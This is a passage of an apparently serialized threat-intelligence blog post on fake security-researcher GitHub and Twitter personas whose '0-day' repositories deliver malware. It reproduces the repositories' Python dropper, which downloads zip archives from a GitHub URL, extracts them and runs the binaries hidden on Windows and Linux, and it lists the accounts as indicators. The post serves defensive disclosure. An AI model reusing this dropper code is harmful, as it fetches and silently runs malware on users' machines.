",[1373,95492,5417],{"class":1397},[1373,95494,4883],{"class":1387},[1373,95496,95497],{"class":1391},"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix\u002Fraw\u002Fmain\u002Fgitignore\u002Fcveswindows.zip",[1373,95499,19057],{"class":1387},[1373,95501,95502,95505,95507,95509,95511,95513,95515,95517,95519,95522,95524,95526,95528,95530,95533,95535,95537,95540],{"class":1375,"line":4756},[1373,95503,95504],{"class":4640}," des ",[1373,95506,5417],{"class":1397},[1373,95508,63565],{"class":4640},[1373,95510,59],{"class":1383},[1373,95512,7590],{"class":63570},[1373,95514,59],{"class":1383},[1373,95516,89372],{"class":11735},[1373,95518,1384],{"class":1383},[1373,95520,95521],{"class":11735},"os",[1373,95523,59],{"class":1383},[1373,95525,63571],{"class":63570},[1373,95527,7035],{"class":1383},[1373,95529,1388],{"class":1387},[1373,95531,95532],{"class":1391},"TMP",[1373,95534,1388],{"class":1387},[1373,95536,27625],{"class":1383},[1373,95538,95539],{"class":11735}," namezip",[1373,95541,11875],{"class":1383},[1373,95543,95544,95546,95548,95550,95552,95554,95556,95558,95560,95562,95564,95566,95568,95570,95572,95574,95576,95578,95580,95582,95584,95586,95588,95590,95592,95595,95597,95599,95602,95604],{"class":1375,"line":4768},[1373,95545,9793],{"class":4636},[1373,95547,78483],{"class":1397},[1373,95549,63565],{"class":4640},[1373,95551,59],{"class":1383},[1373,95553,7590],{"class":63570},[1373,95555,59],{"class":1383},[1373,95557,78745],{"class":11735},[1373,95559,1384],{"class":1383},[1373,95561,95521],{"class":11735},[1373,95563,59],{"class":1383},[1373,95565,7590],{"class":63570},[1373,95567,59],{"class":1383},[1373,95569,89372],{"class":11735},[1373,95571,1384],{"class":1383},[1373,95573,95521],{"class":11735},[1373,95575,59],{"class":1383},[1373,95577,63571],{"class":63570},[1373,95579,7035],{"class":1383},[1373,95581,1388],{"class":1387},[1373,95583,95532],{"class":1391},[1373,95585,1388],{"class":1387},[1373,95587,27625],{"class":1383},[1373,95589,46496],{"class":11735},[1373,95591,5437],{"class":1383},[1373,95593,95594],{"class":11735}," name ",[1373,95596,15448],{"class":1397},[1373,95598,4883],{"class":1387},[1373,95600,95601],{"class":1391},".exe",[1373,95603,183],{"class":1387},[1373,95605,95606],{"class":1383},")):\n",[1373,95608,95609,95612,95614,95616,95618,95621,95623,95625,95627,95630],{"class":1375,"line":4792},[1373,95610,95611],{"class":4640}," urllib",[1373,95613,59],{"class":1383},[1373,95615,75186],{"class":63570},[1373,95617,59],{"class":1383},[1373,95619,95620],{"class":11735},"urlretrieve",[1373,95622,1384],{"class":1383},[1373,95624,7585],{"class":11735},[1373,95626,5437],{"class":1383},[1373,95628,95629],{"class":11735}," des",[1373,95631,11875],{"class":1383},[1373,95633,95634,95637,95640,95642,95645,95647,95649,95652,95654,95656,95658,95660,95662,95664,95666,95668,95670,95673,95675,95677,95679,95682,95684,95686,95688,95691],{"class":1375,"line":4798},[1373,95635,95636],{"class":4636}," with",[1373,95638,95639],{"class":1379}," open",[1373,95641,1384],{"class":1383},[1373,95643,95644],{"class":11735},"des",[1373,95646,5437],{"class":1383},[1373,95648,4713],{"class":1387},[1373,95650,95651],{"class":1391},"wb",[1373,95653,1388],{"class":1387},[1373,95655,2230],{"class":1383},[1373,95657,57330],{"class":4636},[1373,95659,55750],{"class":4640},[1373,95661,4606],{"class":1383},[1373,95663,55750],{"class":4640},[1373,95665,59],{"class":1383},[1373,95667,75355],{"class":11735},[1373,95669,1384],{"class":1383},[1373,95671,95672],{"class":11735},"urllib",[1373,95674,59],{"class":1383},[1373,95676,75186],{"class":63570},[1373,95678,59],{"class":1383},[1373,95680,95681],{"class":11735},"urlopen",[1373,95683,1384],{"class":1383},[1373,95685,7585],{"class":11735},[1373,95687,27987],{"class":1383},[1373,95689,95690],{"class":11735},"read",[1373,95692,11781],{"class":1383},[1373,95694,95695,95698,95700,95703,95705,95707,95709,95711,95713,95715],{"class":1375,"line":4806},[1373,95696,95697],{"class":4640}," zf ",[1373,95699,5417],{"class":1397},[1373,95701,95702],{"class":11735}," ZipFile",[1373,95704,1384],{"class":1383},[1373,95706,95644],{"class":11735},[1373,95708,5437],{"class":1383},[1373,95710,4713],{"class":1387},[1373,95712,11872],{"class":1391},[1373,95714,1388],{"class":1387},[1373,95716,11875],{"class":1383},[1373,95718,95719,95722,95724,95727,95729,95731,95733,95735,95737,95739,95741,95743,95745,95747,95749,95751,95753,95755,95757,95759],{"class":1375,"line":4817},[1373,95720,95721],{"class":4640}," zf",[1373,95723,59],{"class":1383},[1373,95725,95726],{"class":11735},"extractall",[1373,95728,1384],{"class":1383},[1373,95730,95521],{"class":11735},[1373,95732,59],{"class":1383},[1373,95734,7590],{"class":63570},[1373,95736,59],{"class":1383},[1373,95738,89372],{"class":11735},[1373,95740,1384],{"class":1383},[1373,95742,95521],{"class":11735},[1373,95744,59],{"class":1383},[1373,95746,63571],{"class":63570},[1373,95748,7035],{"class":1383},[1373,95750,1388],{"class":1387},[1373,95752,95532],{"class":1391},[1373,95754,1388],{"class":1387},[1373,95756,27625],{"class":1383},[1373,95758,46496],{"class":11735},[1373,95760,16761],{"class":1383},[1373,95762,95763,95765,95767,95769],{"class":1375,"line":4825},[1373,95764,95721],{"class":4640},[1373,95766,59],{"class":1383},[1373,95768,75402],{"class":11735},[1373,95770,27326],{"class":1383},[1373,95772,95773,95776,95778,95781,95783,95786,95788,95790,95792,95794,95796,95798,95800,95802,95804,95806,95808,95810,95812,95814,95816,95818,95820,95822,95824,95826,95828,95830,95833,95836,95838,95841,95844,95846,95848,95850,95853,95855],{"class":1375,"line":4835},[1373,95774,95775],{"class":4640}," pid ",[1373,95777,5417],{"class":1397},[1373,95779,95780],{"class":4640}," subprocess",[1373,95782,59],{"class":1383},[1373,95784,95785],{"class":11735},"Popen",[1373,95787,15044],{"class":1383},[1373,95789,95521],{"class":11735},[1373,95791,59],{"class":1383},[1373,95793,7590],{"class":63570},[1373,95795,59],{"class":1383},[1373,95797,89372],{"class":11735},[1373,95799,1384],{"class":1383},[1373,95801,95521],{"class":11735},[1373,95803,59],{"class":1383},[1373,95805,63571],{"class":63570},[1373,95807,7035],{"class":1383},[1373,95809,1388],{"class":1387},[1373,95811,95532],{"class":1391},[1373,95813,1388],{"class":1387},[1373,95815,27625],{"class":1383},[1373,95817,46496],{"class":11735},[1373,95819,5437],{"class":1383},[1373,95821,95594],{"class":11735},[1373,95823,15448],{"class":1397},[1373,95825,4883],{"class":1387},[1373,95827,95601],{"class":1391},[1373,95829,183],{"class":1387},[1373,95831,95832],{"class":1383},")],",[1373,95834,95835],{"class":19096}," creationflags",[1373,95837,5417],{"class":1397},[1373,95839,95840],{"class":7293},"0x",[1373,95842,95843],{"class":5467},"00000008",[1373,95845,2233],{"class":1397},[1373,95847,95780],{"class":11735},[1373,95849,59],{"class":1383},[1373,95851,95852],{"class":37971},"CREATE_NO_WINDOW",[1373,95854,27987],{"class":1383},[1373,95856,95857],{"class":63570},"pid\n",[1373,95859,95860,95863],{"class":1375,"line":4843},[1373,95861,95862],{"class":4636}," except",[1373,95864,11747],{"class":1383},[1373,95866,95867],{"class":1375,"line":4849},[1373,95868,95869],{"class":4636}," pass\n",[1373,95871,95872,95874],{"class":1375,"line":4877},[1373,95873,7643],{"class":4636},[1373,95875,11747],{"class":1383},[1373,95877,95878,95881,95883,95885,95888],{"class":1375,"line":4915},[1373,95879,95880],{"class":4640}," url ",[1373,95882,5417],{"class":1397},[1373,95884,4883],{"class":1387},[1373,95886,95887],{"class":1391},"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix\u002Fraw\u002Fmain\u002Fgitignore\u002Fcveslinux.zip",[1373,95889,19057],{"class":1387},[1373,95891,95892,95895,95897,95899,95902],{"class":1375,"line":4931},[1373,95893,95894],{"class":4640}," namezip ",[1373,95896,5417],{"class":1397},[1373,95898,4883],{"class":1387},[1373,95900,95901],{"class":1391},"cveslinux.zip",[1373,95903,19057],{"class":1387},[1373,95905,95906,95909,95911,95913,95916],{"class":1375,"line":4947},[1373,95907,95908],{"class":4640}," name ",[1373,95910,5417],{"class":1397},[1373,95912,4883],{"class":1387},[1373,95914,95915],{"class":1391},"cveslinux",[1373,95917,19057],{"class":1387},[1373,95919,95920],{"class":1375,"line":4952},[1373,95921,6520],{"emptyLinePlaceholder":237},[1373,95923,95924,95927,95929,95931,95933,95935,95937,95939,95941,95943,95946,95948,95950,95952,95954,95956,95958,95960,95963,95965,95967,95969,95971,95974,95976,95978,95980],{"class":1375,"line":6776},[1373,95925,95926],{"class":4640}," des ",[1373,95928,5417],{"class":1397},[1373,95930,63565],{"class":4640},[1373,95932,59],{"class":1383},[1373,95934,7590],{"class":63570},[1373,95936,59],{"class":1383},[1373,95938,89372],{"class":11735},[1373,95940,1384],{"class":1383},[1373,95942,183],{"class":1387},[1373,95944,95945],{"class":1391},"\u002Fhome\u002F",[1373,95947,183],{"class":1387},[1373,95949,15478],{"class":1397},[1373,95951,63565],{"class":11735},[1373,95953,59],{"class":1383},[1373,95955,63571],{"class":63570},[1373,95957,7035],{"class":1383},[1373,95959,183],{"class":1387},[1373,95961,95962],{"class":1391},"USERNAME",[1373,95964,183],{"class":1387},[1373,95966,15050],{"class":1383},[1373,95968,15478],{"class":1397},[1373,95970,4883],{"class":1387},[1373,95972,95973],{"class":1391},"\u002F.local\u002Fshare",[1373,95975,183],{"class":1387},[1373,95977,5437],{"class":1383},[1373,95979,95539],{"class":11735},[1373,95981,11875],{"class":1383},[1373,95983,95984,95986,95988,95990,95992,95994,95996,95998,96000,96002,96004,96006,96008,96010,96012,96014,96016,96018,96020,96022,96024,96026,96028,96030,96032,96034,96036,96038,96040,96042,96044,96046,96048,96050,96052],{"class":1375,"line":6781},[1373,95985,9773],{"class":4636},[1373,95987,78483],{"class":1397},[1373,95989,63565],{"class":4640},[1373,95991,59],{"class":1383},[1373,95993,7590],{"class":63570},[1373,95995,59],{"class":1383},[1373,95997,78745],{"class":11735},[1373,95999,1384],{"class":1383},[1373,96001,95521],{"class":11735},[1373,96003,59],{"class":1383},[1373,96005,7590],{"class":63570},[1373,96007,59],{"class":1383},[1373,96009,89372],{"class":11735},[1373,96011,1384],{"class":1383},[1373,96013,183],{"class":1387},[1373,96015,95945],{"class":1391},[1373,96017,183],{"class":1387},[1373,96019,15478],{"class":1397},[1373,96021,63565],{"class":11735},[1373,96023,59],{"class":1383},[1373,96025,63571],{"class":63570},[1373,96027,7035],{"class":1383},[1373,96029,183],{"class":1387},[1373,96031,95962],{"class":1391},[1373,96033,183],{"class":1387},[1373,96035,15050],{"class":1383},[1373,96037,15478],{"class":1397},[1373,96039,4883],{"class":1387},[1373,96041,95973],{"class":1391},[1373,96043,183],{"class":1387},[1373,96045,5437],{"class":1383},[1373,96047,46496],{"class":11735},[1373,96049,5437],{"class":1383},[1373,96051,46496],{"class":11735},[1373,96053,95606],{"class":1383},[1373,96055,96056,96059,96061,96063,96065,96067,96069,96071,96073,96075],{"class":1375,"line":7524},[1373,96057,96058],{"class":4640}," urllib",[1373,96060,59],{"class":1383},[1373,96062,75186],{"class":63570},[1373,96064,59],{"class":1383},[1373,96066,95620],{"class":11735},[1373,96068,1384],{"class":1383},[1373,96070,7585],{"class":11735},[1373,96072,5437],{"class":1383},[1373,96074,95629],{"class":11735},[1373,96076,11875],{"class":1383},[1373,96078,96079,96082,96084,96086,96088,96090,96092,96094,96096,96098,96100,96102,96104,96106,96108,96110,96112,96114,96116,96118,96120,96122,96124,96126,96128,96130],{"class":1375,"line":7530},[1373,96080,96081],{"class":4636}," with",[1373,96083,95639],{"class":1379},[1373,96085,1384],{"class":1383},[1373,96087,95644],{"class":11735},[1373,96089,5437],{"class":1383},[1373,96091,4713],{"class":1387},[1373,96093,95651],{"class":1391},[1373,96095,1388],{"class":1387},[1373,96097,2230],{"class":1383},[1373,96099,57330],{"class":4636},[1373,96101,55750],{"class":4640},[1373,96103,4606],{"class":1383},[1373,96105,55750],{"class":4640},[1373,96107,59],{"class":1383},[1373,96109,75355],{"class":11735},[1373,96111,1384],{"class":1383},[1373,96113,95672],{"class":11735},[1373,96115,59],{"class":1383},[1373,96117,75186],{"class":63570},[1373,96119,59],{"class":1383},[1373,96121,95681],{"class":11735},[1373,96123,1384],{"class":1383},[1373,96125,7585],{"class":11735},[1373,96127,27987],{"class":1383},[1373,96129,95690],{"class":11735},[1373,96131,11781],{"class":1383},[1373,96133,96134,96137,96139,96141,96143,96145,96147,96149,96151,96153],{"class":1375,"line":7546},[1373,96135,96136],{"class":4640}," zf ",[1373,96138,5417],{"class":1397},[1373,96140,95702],{"class":11735},[1373,96142,1384],{"class":1383},[1373,96144,95644],{"class":11735},[1373,96146,5437],{"class":1383},[1373,96148,4713],{"class":1387},[1373,96150,11872],{"class":1391},[1373,96152,1388],{"class":1387},[1373,96154,11875],{"class":1383},[1373,96156,96157,96160,96162,96164,96166,96168,96170,96172,96174,96176,96178,96180,96182,96184,96186,96188,96190,96192,96194,96196,96198,96200,96202,96204,96206,96208,96210,96212,96214],{"class":1375,"line":7571},[1373,96158,96159],{"class":4640}," zf",[1373,96161,59],{"class":1383},[1373,96163,95726],{"class":11735},[1373,96165,1384],{"class":1383},[1373,96167,95521],{"class":11735},[1373,96169,59],{"class":1383},[1373,96171,7590],{"class":63570},[1373,96173,59],{"class":1383},[1373,96175,89372],{"class":11735},[1373,96177,1384],{"class":1383},[1373,96179,183],{"class":1387},[1373,96181,95945],{"class":1391},[1373,96183,183],{"class":1387},[1373,96185,15478],{"class":1397},[1373,96187,63565],{"class":11735},[1373,96189,59],{"class":1383},[1373,96191,63571],{"class":63570},[1373,96193,7035],{"class":1383},[1373,96195,183],{"class":1387},[1373,96197,95962],{"class":1391},[1373,96199,183],{"class":1387},[1373,96201,15050],{"class":1383},[1373,96203,15478],{"class":1397},[1373,96205,4883],{"class":1387},[1373,96207,95973],{"class":1391},[1373,96209,183],{"class":1387},[1373,96211,5437],{"class":1383},[1373,96213,46496],{"class":11735},[1373,96215,16761],{"class":1383},[1373,96217,96218,96220,96222,96224],{"class":1375,"line":7598},[1373,96219,96159],{"class":4640},[1373,96221,59],{"class":1383},[1373,96223,75402],{"class":11735},[1373,96225,27326],{"class":1383},[1373,96227,96228,96231,96233,96235,96237,96240,96242,96244,96246,96248,96250,96252,96254,96256,96258,96260,96262,96264,96266,96268,96270,96272,96274,96276,96278,96280,96282,96284,96286,96288,96290,96292,96294],{"class":1375,"line":7615},[1373,96229,96230],{"class":4640}," st ",[1373,96232,5417],{"class":1397},[1373,96234,63565],{"class":4640},[1373,96236,59],{"class":1383},[1373,96238,96239],{"class":11735},"stat",[1373,96241,1384],{"class":1383},[1373,96243,95521],{"class":11735},[1373,96245,59],{"class":1383},[1373,96247,7590],{"class":63570},[1373,96249,59],{"class":1383},[1373,96251,89372],{"class":11735},[1373,96253,1384],{"class":1383},[1373,96255,183],{"class":1387},[1373,96257,95945],{"class":1391},[1373,96259,183],{"class":1387},[1373,96261,15478],{"class":1397},[1373,96263,63565],{"class":11735},[1373,96265,59],{"class":1383},[1373,96267,63571],{"class":63570},[1373,96269,7035],{"class":1383},[1373,96271,183],{"class":1387},[1373,96273,95962],{"class":1391},[1373,96275,183],{"class":1387},[1373,96277,15050],{"class":1383},[1373,96279,15478],{"class":1397},[1373,96281,4883],{"class":1387},[1373,96283,95973],{"class":1391},[1373,96285,183],{"class":1387},[1373,96287,5437],{"class":1383},[1373,96289,46496],{"class":11735},[1373,96291,5437],{"class":1383},[1373,96293,46496],{"class":11735},[1373,96295,16761],{"class":1383},[1373,96297,96298,96301,96303,96305,96307,96309,96311,96313,96315,96317,96319,96321,96323,96325,96327,96329,96331,96333,96335,96337,96339,96341,96343,96345,96347,96349,96351,96353,96355,96357,96359,96361,96364,96366,96369,96371,96374,96376,96379],{"class":1375,"line":7635},[1373,96299,96300],{"class":4640}," os",[1373,96302,59],{"class":1383},[1373,96304,31890],{"class":11735},[1373,96306,1384],{"class":1383},[1373,96308,95521],{"class":11735},[1373,96310,59],{"class":1383},[1373,96312,7590],{"class":63570},[1373,96314,59],{"class":1383},[1373,96316,89372],{"class":11735},[1373,96318,1384],{"class":1383},[1373,96320,183],{"class":1387},[1373,96322,95945],{"class":1391},[1373,96324,183],{"class":1387},[1373,96326,15478],{"class":1397},[1373,96328,63565],{"class":11735},[1373,96330,59],{"class":1383},[1373,96332,63571],{"class":63570},[1373,96334,7035],{"class":1383},[1373,96336,183],{"class":1387},[1373,96338,95962],{"class":1391},[1373,96340,183],{"class":1387},[1373,96342,15050],{"class":1383},[1373,96344,15478],{"class":1397},[1373,96346,4883],{"class":1387},[1373,96348,95973],{"class":1391},[1373,96350,183],{"class":1387},[1373,96352,5437],{"class":1383},[1373,96354,46496],{"class":11735},[1373,96356,5437],{"class":1383},[1373,96358,46496],{"class":11735},[1373,96360,15534],{"class":1383},[1373,96362,96363],{"class":11735}," st",[1373,96365,59],{"class":1383},[1373,96367,96368],{"class":63570},"st_mode",[1373,96370,2233],{"class":1397},[1373,96372,96373],{"class":11735}," stat",[1373,96375,59],{"class":1383},[1373,96377,96378],{"class":37971},"S_IEXEC",[1373,96380,11875],{"class":1383},[1373,96382,96383,96386,96388,96390,96392,96394,96396,96398,96400,96402,96405,96407,96409,96411,96413,96415,96417,96419,96421,96423,96425,96427,96429,96431,96433,96435,96437,96439,96441,96443,96445,96447,96449,96451,96453,96455,96457,96459,96461,96463,96466,96468,96471,96473,96476,96478,96481,96483,96486,96488,96491,96493,96495,96497,96500],{"class":1375,"line":7640},[1373,96384,96385],{"class":4640}," subprocess",[1373,96387,59],{"class":1383},[1373,96389,95785],{"class":11735},[1373,96391,15044],{"class":1383},[1373,96393,183],{"class":1387},[1373,96395,17928],{"class":1391},[1373,96397,183],{"class":1387},[1373,96399,5437],{"class":1383},[1373,96401,4883],{"class":1387},[1373,96403,96404],{"class":1391},"-c",[1373,96406,183],{"class":1387},[1373,96408,5437],{"class":1383},[1373,96410,63565],{"class":11735},[1373,96412,59],{"class":1383},[1373,96414,7590],{"class":63570},[1373,96416,59],{"class":1383},[1373,96418,89372],{"class":11735},[1373,96420,1384],{"class":1383},[1373,96422,183],{"class":1387},[1373,96424,95945],{"class":1391},[1373,96426,183],{"class":1387},[1373,96428,15478],{"class":1397},[1373,96430,63565],{"class":11735},[1373,96432,59],{"class":1383},[1373,96434,63571],{"class":63570},[1373,96436,7035],{"class":1383},[1373,96438,183],{"class":1387},[1373,96440,95962],{"class":1391},[1373,96442,183],{"class":1387},[1373,96444,15050],{"class":1383},[1373,96446,15478],{"class":1397},[1373,96448,4883],{"class":1387},[1373,96450,95973],{"class":1391},[1373,96452,183],{"class":1387},[1373,96454,5437],{"class":1383},[1373,96456,46496],{"class":11735},[1373,96458,5437],{"class":1383},[1373,96460,46496],{"class":11735},[1373,96462,95832],{"class":1383},[1373,96464,96465],{"class":19096}," start_new_session",[1373,96467,5417],{"class":1397},[1373,96469,96470],{"class":7054},"True",[1373,96472,5437],{"class":1383},[1373,96474,96475],{"class":19096}," stdout",[1373,96477,5417],{"class":1397},[1373,96479,96480],{"class":11735},"subprocess",[1373,96482,59],{"class":1383},[1373,96484,96485],{"class":37971},"DEVNULL",[1373,96487,5437],{"class":1383},[1373,96489,96490],{"class":19096}," stderr",[1373,96492,5417],{"class":1397},[1373,96494,96480],{"class":11735},[1373,96496,59],{"class":1383},[1373,96498,96499],{"class":37971},"STDOUT",[1373,96501,11875],{"class":1383},[1373,96503,96504],{"class":1375,"line":7648},[1373,96505,6520],{"emptyLinePlaceholder":237},[1373,96507,96508],{"class":1375,"line":7672},[1373,96509,6520],{"emptyLinePlaceholder":237},[1373,96511,96512,96515],{"class":1375,"line":7688},[1373,96513,96514],{"class":11735}," main",[1373,96516,27326],{"class":1383},[18,96518,96519,96520,96522,96523,1554,96525,96527,96528,96533,96534,96539],{},"Above, ",[886,96521,95408],{}," downloads one of two zip files. ",[886,96524,95901],{},[886,96526,95469],{}," are fetched from GitHub, unzipped, written to disk, and executed. The Windows binary has a very high detection rate on VirusTotal (",[47,96529,96532],{"href":96530,"rel":96531},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F777c9220670025a487f4e853987df0482fbd545189137d58a60d4ab37c1cfbb4",[51],"43\u002F71","). The Linux binary much less so (",[47,96535,96538],{"href":96536,"rel":96537},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fba4be87b3747e6c009c3aa9c9f28ce4331cd3fe2bd0d332283f226d747698733\u002Fdetection",[51],"3\u002F62","), but it contains some very obvious strings indicating its nature.",[18,96541,96542],{},[68,96543],{":width":10862,"alt":95402,"src":96544},"\u002Fblog\u002Ffake-repos-deliver-malicious-implant\u002Fghidra.png",[18,96546,96547,96548,96550],{},"The attacker has made a lot of effort to create all these fake personas, only to deliver very obvious malware. It’s unclear if they have been successful, but given that they’ve continued to pursue this avenue of attacks, it seems they believe they ",[1131,96549,13641],{}," be successful.",[18,96552,96553,96554,96559],{},"It isn’t clear if this is a single individual with too much time on their hands, or something more advanced like the campaign uncovered by ",[47,96555,96558],{"href":96556,"rel":96557},"https:\u002F\u002Fblog.google\u002Fthreat-analysis-group\u002Fnew-campaign-targeting-security-researchers\u002F",[51],"Google TAG in January 2021",". Either way, security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. Always review the code you are executing and don’t use anything you don’t understand.",[18,96561,96562],{},"If you have engaged with any of the following accounts, consider the possibility that you’ve been compromised.",[993,96564,96566],{"id":96565},"github-accounts","GitHub Accounts",[1789,96568,96569,96575,96581,96587,96593,96599,96605],{},[25,96570,96571],{},[47,96572,96573],{"href":96573,"rel":96574},"https:\u002F\u002Fgithub.com\u002FAKuzmanHSCS",[51],[25,96576,96577],{},[47,96578,96579],{"href":96579,"rel":96580},"https:\u002F\u002Fgithub.com\u002FRShahHSCS",[51],[25,96582,96583],{},[47,96584,96585],{"href":96585,"rel":96586},"https:\u002F\u002Fgithub.com\u002FBAdithyaHSCS",[51],[25,96588,96589],{},[47,96590,96591],{"href":96591,"rel":96592},"https:\u002F\u002Fgithub.com\u002FDLandonHSCS",[51],[25,96594,96595],{},[47,96596,96597],{"href":96597,"rel":96598},"https:\u002F\u002Fgithub.com\u002FMHadzicHSCS",[51],[25,96600,96601],{},[47,96602,96603],{"href":96603,"rel":96604},"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS",[51],[25,96606,96607],{},[47,96608,96609],{"href":96609,"rel":96610},"https:\u002F\u002Fgithub.com\u002FSSankkarHSCS",[51],[993,96612,96614],{"id":96613},"malicious-repositories","Malicious Repositories",[1789,96616,96617,96623,96629,96635,96641,96647,96653],{},[25,96618,96619],{},[47,96620,96621],{"href":96621,"rel":96622},"https:\u002F\u002Fgithub.com\u002FAKuzmanHSCS\u002FMicrosoft-Exchange-RCE",[51],[25,96624,96625],{},[47,96626,96627],{"href":96627,"rel":96628},"https:\u002F\u002Fgithub.com\u002FMHadzicHSCS\u002FChrome-0-day",[51],[25,96630,96631],{},[47,96632,96633],{"href":96633,"rel":96634},"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix",[51],[25,96636,96637],{},[47,96638,96639],{"href":96639,"rel":96640},"https:\u002F\u002Fgithub.com\u002FBAdithyaHSCS\u002FExchange-0-Day",[51],[25,96642,96643],{},[47,96644,96645],{"href":96645,"rel":96646},"https:\u002F\u002Fgithub.com\u002FRShahHSCS\u002FDiscord-0-Day-Exploit",[51],[25,96648,96649],{},[47,96650,96651],{"href":96651,"rel":96652},"https:\u002F\u002Fgithub.com\u002FDLandonHSCS\u002FDiscord-RCE",[51],[25,96654,96655],{},[47,96656,96657],{"href":96657,"rel":96658},"https:\u002F\u002Fgithub.com\u002FSSankkarHSCS\u002FChromium-0-Day",[51],[993,96660,96662],{"id":96661},"twitter-accounts","Twitter Accounts",[1789,96664,96665,96671,96677,96683],{},[25,96666,96667],{},[47,96668,96669],{"href":96669,"rel":96670},"https:\u002F\u002Ftwitter.com\u002FAKuzmanHSCS",[51],[25,96672,96673],{},[47,96674,96675],{"href":96675,"rel":96676},"https:\u002F\u002Ftwitter.com\u002FDLandonHSCS",[51],[25,96678,96679],{},[47,96680,96681],{"href":96681,"rel":96682},"https:\u002F\u002Ftwitter.com\u002FGSandersonHSCS",[51],[25,96684,96685],{},[47,96686,96687],{"href":96687,"rel":96688},"https:\u002F\u002Ftwitter.com\u002FMHadzicHSCS",[51],[2901,96690,96691],{},"html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .s91G_, html code.shiki .s91G_{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .squCx, html code.shiki .squCx{--shiki-light:#E53935;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sAZ-3, html code.shiki .sAZ-3{--shiki-light:#6182B8;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .sQgqH, html code.shiki .sQgqH{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#E36209;--shiki-default-font-style:inherit;--shiki-dark:#FFAB70;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sYoWi, html code.shiki .sYoWi{--shiki-light:#E53935;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}",{"title":219,"searchDepth":220,"depth":220,"links":96693},[96694,96695,96696],{"id":96565,"depth":1266,"text":96566},{"id":96613,"depth":1266,"text":96614},{"id":96661,"depth":1266,"text":96662},"VulnCheck discovers a network of fake security researcher accounts promoting hidden 